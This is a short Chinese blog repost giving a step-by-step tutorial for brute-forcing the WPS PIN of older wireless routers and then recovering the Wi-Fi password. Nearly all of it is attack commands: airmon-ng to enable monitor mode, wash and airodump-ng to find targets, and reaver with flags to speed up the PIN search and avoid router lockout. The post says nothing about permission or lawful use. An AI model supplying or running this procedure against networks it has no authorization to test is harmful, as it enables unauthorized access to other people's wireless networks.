大家好,又见面了,我是你们的朋友全栈君。
部分老版路由器有WPS或叫QSS功能,并且在默认开启状态时,可使用此工具。
PIN码共为8位,按4 3 1 分段,总共穷举有11000种组合。通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码。
容易碰到的问题:连接超时,卡住,路由自保护等。
reave的进度表文件保存在/usr/local/etc/reaver/MAC地址.wpc 或/etc/reaver/MAC地址.wpc
基本用法:
1、ifconfig //查看网络配置信息,网卡的模式和名称:常见为wlan0
2、airmon-ng start wlan0 //开启监听模式,此时网卡名变为 wlan0mon
3、wash -i wlan0mon //利用wash,查看开启WPS的无线路由器
4、airodump-ng wlan0mon //查看周边AP信息
5、reaver -i wlan0mon -b <Bssid> -vv //开始穷举PIN码
// -i:网卡名称;-b:Bssid即路由ID;-vv:显示更多的非严重警告
// -p:pin码;-S :使用最小的DH key,可提高破解速度;
//另外,也可以给命令增加2个参数,延长PIN穷举和反馈的响应时间避免路由当机。
-d 即delay每穷举一次的闲置时间预设为1秒;-t 即timeout每次穷举等待反馈的最长时间
6、[reaver -i wlan0mon -b <Bssid> -vv -p xxxx] //从前4位PIN码开始
7、知道PIN码以后使用如下命令反算出wifi连接密码
reaver -i wlan0mon -b <Bssid> ‘s MAC -p PIN码
此方法受信号强度和WPS保护机置等影响,尝试过几次,均信号在-70左右,均连接超时。
参考链接:https://zhuanlan.zhihu.com/p/24803690
发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/137877.html原文链接:https://javaforall.net
